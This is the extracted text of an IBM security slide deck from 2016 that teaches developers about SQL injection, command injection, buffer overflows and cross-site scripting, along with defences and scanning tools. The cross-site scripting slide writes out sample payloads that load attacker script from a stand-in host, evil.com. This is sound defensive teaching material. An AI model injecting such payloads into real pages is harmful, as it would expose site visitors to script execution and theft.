Inside the Mind of a HackerPAUL IONESCU, IBM X-FORCE ETHICAL HACKING TEAM

The Price of a Security BugINTRODUCTION

3 IBM Security

Functionality vs. Security

• As developers we want to create highly functional software unrestricted by the constraints of compliance standards and tedious business processes.

• Product security is incorrectly perceived to be a burden on agile software development.

• Security measures are often an afterthought. Something you have to do not something you want to do.

High Security

Low Security

High Functionality

Low Functionality

4 IBM Security

Developing Secure and Highly Functional Products is Possible

• If done early in the development lifecycle security is not hard or costly or conflicting with functionality.

• This can be achieved by educating developers about threats.

High Security

Low Security

High Functionality

Low Functionality

Not accurate

5 IBM Security

What is a 0-day?

• A zero day is an unpublished security bug that has become known by a malicious party

• Commonly found in widely used software

6 IBM Security

Meet The Hackers Who Sell Spies The Tools To Crack Your PC

Vupen’s chief executive and lead hacker, Chaouki Bekrar, says his company never had any intention of telling Google its secret techniques—certainly not for $60,000 in chump change.”

ANDY GREENBERG, FORBES

The Security Vulnerability Business• VUPEN – specializing in selling zero-days to the highest bidder

• Refused Pwn2Own $60k prize because the zero day was worth more undisclosed

7 IBM Security

Bug Poaching

• As uncovered recently by IBM X-Force, web application flaws used in Ransomware style attacks.

• 30 enterprise organizations targeted last year.

• Attackers find and exploit website vulnerabilities.

• SQL Injection main method of attack.

• Once they obtain sensitive data attackers store it on a cloud service

• An email is sent to the organization that links to the data as proof that the attacker has penetrated the network.

• Attackers ask for large payments, $30k+ to reveal the flaws

8 IBM Security

Types of Hackers

• White-hat hackers H̶ abide by the rules of responsible disclosureH̶ notify companies about vulnerabilities before making them publicH̶ they don’t require any other reward than recognition for identifying the issueH̶ also referred to as ethical hackers

• Gray-hat hackersH̶ operate at the boundary of the lawH̶ may be selling zero-day vulnerabilities to the bad guys or governments

• Black-hat hackersH̶ they are the cybercriminalsH̶ use zero-days to break into systems and steal data.

9 IBM Security

What would a Hacker do?

• Understanding common programming flaws can help developers prevent security issues

• Getting into the hacker mindset allows identifying abuse cases

• Implement software defenses while the software is written, reducing cost and potentially avoiding thousands of dollars in damages

• You can cost the black hat and grey hats lots of money because they won’t have 0-days to sell!

10 IBM Security

The Top Programming Flaws

• Two highly used lists: OWASP Top 10 and MITRE (SANS) Top 25.

• The MITRE Top 25 focuses on software mistakes.

# CWE Name

1 CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

2 CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

3 CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

4 CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

SQL InjectionATTACKING THE DATABASE

12 IBM Security

The 15 worst data security breaches of the 21st Century

134 million credit cards exposed through SQL injection to install spyware on Heartland's data systems”

TAYLOR ARMERDING, WWW.CSOONLINE.COM

The Worst Data Breach of the 21st Century

• In comparison the OPM hack was 21.5 million records

• In 2012 SQLi responsible for more than half of all data breaches where the attack type has been disclosed according to IBM X-Force

13 IBM Security

• User input is concatenated into a database query

• Attacker can manipulate the query practically injecting SQL code and altering the functionality of the application

• Attackers can even execute OS commands

What is the programming flaw?

14 IBM Security

• Java Prepared Statement example, removing the need for concatenation

Preventing SQL Injection with Parameterized Statements

15 IBM Security

• Many user-provided parameters only need to be alphanumeric

• Input Validation whitelisting – alphanumeric by default, special characters by exception

• This reduces the attack surface for many types of attacks not only SQL Injection

• Implement an input validation framework

Adding Input Validation to Prevent Injection

OS Command InjectionATTACKING THE SHELL

17 IBM Security

Web attacks build on Shellshock bug

One group used their Shellshock botnet to bombard machines run by Akamai with huge amounts of junk data to try to knock them offline.

WWW.BBC.COM

The Famous 0-Day • The 2014 Shellshock bug affected millions of servers around the world

• It has it’s own logo and Wikipedia article.

18 IBM Security

• The software concatenates or substitutes user input in a shell command.

• The example below is from the recently disclosed “ImageTragik” bug

• The %M part is substituted with a user-provided link. If a graphics file contains a link like this:

• The software executes:

What is the programming flaw?

19 IBM Security

• Use Input Validation

• Use parameterized functions where user input is being passed as parameters rather than one full command

Preventing Command Injection

Vulnerable Using a Parameterized Function

Buffer OverflowATTACKING THE MEMORY

21 IBM Security

• A contest held during the CanSecWest security conference.

• Payouts topped $500,000 in 2014, with over a dozen new vulnerabilities found in Adobe Reader, Adobe Flash Player, Internet Explorer 11, Google Chrome and Mozilla Firefox

• Many the zero-days disclosed at Pwn2Own are memory flaws — for example, CVE-2012-1876, which is a buffer overflow in Internet Explorer, or CVE-2014-1303, a buffer overflow in Apple Safari.

• Using such a vulnerability gives the attacker complete control over the victim’s machine.

• For these reason memory flaws found in common software are extremely valuable on the black market.

Pwn2Own

22 IBM Security

Chinese Hackers Compromised Forbes.com Using IE, Flash Zero Days

Chinese APT group uses IE, Flash zero days to compromise Forbes.com

CHRIS BROOK, WWW.THREATPOST.COM

Using Software Flaws in Cyber Espionage

23 IBM Security

• Buffer Overflow is caused by improper memory management in C/C++ code

• Example simple C program that validates a password

• The code does not perform any validation on the length of the user input and does not bother ensuring that sufficient memory was allocated to store the data coming from the user

What is the programming flaw?

24 IBM Security

• The table below shows the memory representation for our vulnerable program, where \0 stands for the null character

• If the user enters more than 16 “A” characters in the verification password, it will override the information stored at the 0x0111 address

Overflowing the buffer

25 IBM Security

• The attacker could overwrite the section in the memory that holds instructions, causing the execution of arbitrary code as shown in the simplistic representation below.

Overflowing the program instructions

26 IBM Security

• Use safe functions. For example fgets (…) allows you to limit the size of the input; fgets (userPass, 16, stdin) resolves the problem.

• Ensure that the size of the input matches the size of the allocated memory.

• Avoid employing user input as format string arguments. This can lead to another memory flaw: format string injection.

• Be careful both when allocating memory and when releasing memory. Use-after-free is another type of memory flaw where the program keeps a reference to a location of the memory. Data at that location can be arbitrarily modified.

• Use safe compiler flags. Such flags enable operating system defenses that make the insertion of arbitrary commands very difficult. For example, Address Space Layout Randomization is a Windows protection mechanism.

Protecting From Memory Attacks

Cross-Site ScriptingATTACKING THE WEB PAGE

28 IBM Security

Earlier today we were informed of a malicious site that was spreading links to StalkDaily.com on Twitter without user consent via a cross-site scripting vulnerability.” TWITTER COMMUNIQUE, APR 11,2009

The XSS Worm

• Malicious Cross-Site Scripting (XSS) script would spread itself from user to user by modifying each user’s profile

• Other social networking sites notably affected by XSS worms. Samy worm affected 1 million MySpace users in 2005

• Attack also commonly used to spoof websites and steal passwords. Major online retailers targeted.

29 IBM Security

• XSS occurs when the web page inserts user input in an unsafe context

• Example unsafe contextsH̶ During server side page generation:

User name: <%=request.getParameter(“userName”)%>User name: <script src=“https://evil.com/attack.js”></script>

H̶ During server side page generation in a JavaScript attribute: <body onload=“loadProfile(<%=request.getParameter(‘userid’)%>’’)”><body onload=“loadProfile(1);eval("var

a=document.createElement(\"script\");a.src=\"https://evil.com/attack.js\";document.body.appendChild(a);")”>

H̶ During server side page generation in a JavaScript snippet: <script>loadProfile(<%=request.getParameter(‘userid’)%></script>”>

H̶ Dynamic updates of innerHtml element attribute: userNameDiv.innerHtml = user.Name;

• Due to the many areas that can be impacted by XSS it is difficult to defend and to miss.

What is the programming flaw?

30 IBM Security

• HtmlEncode user input before introducing it into unsafe context.

• Dynamic page updates should update the innerText / contentText attribute of html nodes

• Enforcing request token checks can prevent reflected cross-site scripting because the page will expire. It will also prevent

• Use secure headers:X-XSS-Protection: 1; mode=block – Enforces the browser XSS filterContent-Security-Policy: script-src ‘self’ – Prevents loading external scripts

Protecting From Web Page Attacks

Catching Software FlawsDEFENDING AGAINST THE HACKERS

32 IBM Security

• AppScan is an application security scanner

• Tooling available both as a cloud service and installable

• Interacts with the application and conducts automated attacks

• In the screenshot you can see a scan of a server vulnerable to SQL Injection and OS Command Injection

Catching SQL Injection and Command Injection with Dynamic Analysis

33 IBM Security

• AppScan Source is a Static Analysis tool also available as a cloud service.

• It examines the program code to identify security issues.

• In the screenshot you can see a scan of the vulnerable sample program presented earlier

Catching Buffer Overflow with Static Analysis

ibm.com/security

securityintelligence.com

xforce.ibmcloud.com

@ibmsecurity

youtube/user/ibmsecuritysolutions

© Copyright IBM Corporation 2016. All rights reserved. The information contained in these materials is provided for informational purposes only, and is provided AS IS without warranty of any kind, express or implied. IBM shall not be responsible for any damages arising out of the use of, or otherwise related to, these materials. Nothing contained in these materials is intended to, nor shall have the effect of, creating any warranties or representations from IBM or its suppliers or licensors, or altering the terms and conditions of the applicable license agreement governing the use of IBM software. References in these materials to IBM products, programs, or services do not imply that they will be available in all countries in which IBM operates. Product release dates and / or capabilities referenced in these materials may change at any time at IBM’s sole discretion based on market opportunities or other factors, and are not intended to be a commitment to future product or feature availability in any way. IBM, the IBM logo, and other IBM products and services are trademarks of the International Business Machines Corporation, in the United States, other countries or both. Other company, product, or service names may be trademarks or service marks of others.

Statement of Good Security Practices: IT system security involves protecting systems and information through prevention, detection and response to improper access from within and outside your enterprise. Improper access can result in information being altered, destroyed, misappropriated or misused or can result in damage to or misuse of your systems, including for use in attacks on others. No IT system or product should be considered completely secure and no single product, service or security measure can be completely effective in preventing improper use or access. IBM systems, products and services are designed to be part of a lawful, comprehensive security approach, which will necessarily involve additional operational procedures, and may require other systems, products or services to be most effective.

IBM DOES NOT WARRANT THAT ANYSYSTEMS, PRODUCTS OR SERVICES ARE IMMUNE FROM, OR WILL MAKE YOUR ENTERPRISE IMMUNE FROM, THE MALICIOUS OR ILLEGAL CONDUCT OF ANY PARTY.

FOLLOW US ON:

THANK YOU